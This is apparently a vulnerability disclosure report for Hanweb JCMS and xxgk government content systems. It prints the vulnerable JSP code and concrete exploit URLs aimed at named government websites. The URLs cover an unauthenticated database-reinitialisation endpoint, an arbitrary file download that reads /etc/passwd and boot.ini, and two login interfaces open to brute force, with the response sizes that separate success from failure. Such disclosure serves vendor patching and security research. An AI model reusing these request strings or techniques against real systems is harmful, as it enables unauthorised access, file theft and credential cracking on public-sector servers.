大汉相关系统漏洞合集（完结篇）

### 简要描述： 太折腾了，没精力了，太累了，完结篇了，以后估计不看鸟。而且厂商给的rank……rank不是你的，都算乌云的……不用太吝啬这个东西。 简单提下内容： 基本所有系统都存在的一处越权； JCMS & xxgk 通用的一处任意文件下载； JCMS & xxgk 通用的两处暴力破解接口； 就这么当完结篇了！冲击我的1000rank，然后该稍微歇着了。 ### 详细说明： 基本所有系统大部分版本都还存在的一个越权： ``` <%@ page contentType="text/html;charset=UTF-8"%> <%@page import="com.hanweb.common.util.Convert"%> <%@page import="com.hanweb.sys.Install"%> <% String main_ip = Convert.getParameter( request,"dbip"); String main_port = Convert.getParameter( request,"dbport"); String main_dbname = Convert.getParameter( request,"dbname"); String main_user = Convert.getParameter( request,"dbuser"); String main_pwd1 = Convert.getParameter( request,"dbpwd1"); //数据库类型 String dbtype = Convert.getParameter( request,"dbtype"); int ndbtype = Convert.getStringValueInt( dbtype ); String strRealPath = application.getRealPath(""); //创建表,初始化数据 Install install = new Install( strRealPath ); boolean bl = install.setDBServer( ndbtype,main_ip,main_port,main_dbname,main_user,main_pwd1 ); String strMessage = ""; //修改配置文件 String iniPath = strRealPath + "/WEB-INF/ini/merpserver.ini"; com.hanweb.common.util.IniFile ini = new com.hanweb.common.util.IniFile( iniPath ); ini.readIni(); ini.setIniValue("b_init","1"); ini.writeIni(); //写日志文件 String errpath = strRealPath + "/setup/log/init_error.txt"; install.writeErrorLog( errpath ); if( bl ) strMessage = "创建成功，请重新启动中间件！"; else strMessage = "创建失败,请查看日志文件!"; out.println( Convert.getAlterScript( " parent.createIndex.style.visibility='hidden';") ); out.println( Convert.getAlterScript( "alert('"+strMessage+"');") ); %> ``` 初始化数据库到指定IP数据库服务器去的，大部分系统大部分版本都是处于没有验证的状态。 给案例 Source: http://www.gansu.gov.cn/source/setup/opr_initdb.jsp?dbip=1.1.1.1&db_port=1433&dbname=test&dbuser=admin123&dbpwd1=admin123&dbtype=2 [<img src="https://images.seebug.org/upload/201403/06004117a660b29ec5ea27f9f0c4347b87af1a5b.png" alt="image001.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/06004117a660b29ec5ea27f9f0c4347b87af1a5b.png) Jiep: http://www.gansu.gov.cn/jiep/setup/opr_initdb.jsp?dbip=1.1.1.1&db_port=1433&dbname=test&dbuser=admin123&dbpwd1=admin123&dbtype=2 [<img src="https://images.seebug.org/upload/201403/0600413684f2b9c649322097e73c92398a0c05be.png" alt="image003.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/0600413684f2b9c649322097e73c92398a0c05be.png) Vipchat: http://www.liaocheng.gov.cn/vipchat/setup/opr_initdb.jsp?dbip=1.1.1.1&db_port=1433&dbname=test&dbuser=admin123&dbpwd1=admin123&dbtype=2 [<img src="https://images.seebug.org/upload/201403/060041559facd1ae423ecd65c5cfa9bdb6f6fc7e.png" alt="image005.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/060041559facd1ae423ecd65c5cfa9bdb6f6fc7e.png) LM http://www.liaocheng.gov.cn/lm/setup/opr_initdb.jsp?dbip=1.1.1.1&db_port=1433&dbname=test&dbuser=admin123&dbpwd1=admin123&dbtype=2 [<img src="https://images.seebug.org/upload/201403/06004213129cda02ef0c424eed9a9b0edaa7661a.png" alt="image007.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/06004213129cda02ef0c424eed9a9b0edaa7661a.png) ### 漏洞证明： JCMS & xxgk 任意文件下载 关键代码： ``` <%@page contentType="text/html;charset=UTF-8"%><%@page import="jcms.util.DownFile"%><%@page import="com.hanweb.common.util.Convert"%><% //原文件名 String strFileName = Convert.getParameter(request,"filename"); //要保存的文件名 String downloadname = Convert.getParameter(request,"savename"); /*下载文件*/ //downloadname = new String( downloadname.getBytes("GBK"), "iso-8859-1"); out.clear(); response.reset(); if(!DownFile.getFile(strFileName,downloadname,response,"UTF-8")){ //response.setContentType("text/html"); //response.setCharacterEncoding("utf-8"); out.println(Convert.getAlterScript("alert('下载失败，文件可能不存在！');")); } %> ``` 其中filename为绝对路径。 先看xxgk的案例： http://xxgk.qidong.gov.cn/gov/m_5_9/downfile.jsp?filename=/etc/passwd&savename=1 [<img src="https://images.seebug.org/upload/201403/060043165179f5ccca528a990d6e537fa697fdb4.png" alt="image009.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/060043165179f5ccca528a990d6e537fa697fdb4.png) http://xxgk.tzhl.gov.cn/xxgk/m_5_9/downfile.jsp?filename=/etc/passwd&savename=1 [<img src="https://images.seebug.org/upload/201403/060043360503ccf052fd7d11b08fd8367a7bfed9.png" alt="image010.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/060043360503ccf052fd7d11b08fd8367a7bfed9.png) http://xxgk.qidong.gov.cn/gov/m_5_9/downfile.jsp?filename=/etc/passwd&savename=1 [<img src="https://images.seebug.org/upload/201403/0600442852cda28cd557a629ee41d45a2493a158.png" alt="image011.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/0600442852cda28cd557a629ee41d45a2493a158.png) 再看JCMS的案例： http://www.xwzf.gov.cn/jcms/m_5_9/downfile.jsp?filename=/etc/passwd&savename=1 [<img src="https://images.seebug.org/upload/201403/0600444346b9901015a47ecb61d9019dd6a90e72.png" alt="image012.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/0600444346b9901015a47ecb61d9019dd6a90e72.png) http://www.huimin.gov.cn/jcms/m_5_9/downfile.jsp?filename=c:/boot.ini&savename=1 [<img src="https://images.seebug.org/upload/201403/06004458409bd0d1945b4158725e654dd3005cca.png" alt="image013.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/06004458409bd0d1945b4158725e654dd3005cca.png) 暴力破解1——某接口可以暴力破解用户名密码 ``` <%@page contentType="text/html;charset=UTF-8" %><%@page import="com.hanweb.common.util.Convert"%><%@page import="com.hanweb.common.log.LogWriter"%><jsp:useBean id="virify" class="jcms.blf.receive.Verify"></jsp:useBean> <%String strErrorInfo = "<html><body>error</body></html>"; String strOptions = ""; // 准备数据 String strLoginId = Convert.getParameter(request, "userid"); String strPassword = Convert.getParameter(request, "password"); // 验证用户 if (!virify.isExist(strLoginId, strPassword)) { LogWriter.error("Error: the user is not exists or password is wrong!"); out.write(strErrorInfo); } else { // 获取网站结构的xml strOptions = virify.getUserWeb(strLoginId); out.write(strOptions); }%> ``` http://www.gansu.gov.cn/xxgk/interface/web.jsp?userid=admin&password=##### 正确情况下的回显： [<img src="https://images.seebug.org/upload/201403/06004639b906d2ef2b61a69568a5c075561012fb.png" alt="image018.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/06004639b906d2ef2b61a69568a5c075561012fb.png) 错误情况下的回显： [<img src="https://images.seebug.org/upload/201403/060046550109cdf0b0f5792ded4fde4708543221.png" alt="image019.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/060046550109cdf0b0f5792ded4fde4708543221.png) 工具测试发了5000多个请求，没问题，可破解成功，错误是33b，正确的56b [<img src="https://images.seebug.org/upload/201403/06004712dfc9592dd42ea8e2b620c912011a0e77.png" alt="image020.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/06004712dfc9592dd42ea8e2b620c912011a0e77.png) Jcms也是有用到类似的代码的： http://www.huimin.gov.cn/jcms/interface/web.jsp [<img src="https://images.seebug.org/upload/201403/060047326296e43a0a59c2ead1d5a681628736dd.png" alt="image022.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/060047326296e43a0a59c2ead1d5a681628736dd.png) 暴力破解也是可行的。 暴力破解2——另一接口也可以暴力破解 ``` <%@page contentType="text/html;charset=UTF-8" %><%@page import="com.hanweb.common.util.Convert"%><%@page import="com.hanweb.common.log.LogWriter"%><jsp:useBean id="virify" class="jcms.blf.receive.Verify"></jsp:useBean> <%String strErrorInfo = "<html><body>error</body></html>"; String strXML = ""; // 准备数据 String strLoginId = Convert.getParameter(request, "userid"); String strPassword = Convert.getParameter(request, "password"); // 验证用户 if (!virify.isExist(strLoginId, strPassword)) { LogWriter.error("Error: the user is not exists or password is wrong!"); out.write(strErrorInfo); } else { // 获取网站结构的xml strXML = virify.getXML(strLoginId, strPassword, strErrorInfo); out.write("<html><body>" + strXML + "</body></html>"); }%> ``` http://www.gansu.gov.cn/xxgk/interface/verify.jsp 密码正确的情况： [<img src="https://images.seebug.org/upload/201403/0600480412f2d143570114db0f88cf73ebc52b59.png" alt="image023.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/0600480412f2d143570114db0f88cf73ebc52b59.png) 错误的情况： [<img src="https://images.seebug.org/upload/201403/060048244e8f38b23c1c238eec9d645a0aceaac9.png" alt="image024.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/060048244e8f38b23c1c238eec9d645a0aceaac9.png) Jcms案例： http://www.huimin.gov.cn/jcms/interface/verify.jsp 不再进行测试。 最后附送一处好像是越权的地方，厂商自己评估是否是开放给民众下载的通道： http://www.gansu.gov.cn/xxgk/jcms_files/jcms1/web1/site/zfxxgk/downinfo.jsp [<img src="https://images.seebug.org/upload/201403/06004917301e1aa66b025cde9068a2897adf1255.png" alt="image015.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/06004917301e1aa66b025cde9068a2897adf1255.png) [<img src="https://images.seebug.org/upload/201403/060049264691721e0aab3be2d901617e78a42941.png" alt="image017.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/060049264691721e0aab3be2d901617e78a42941.png)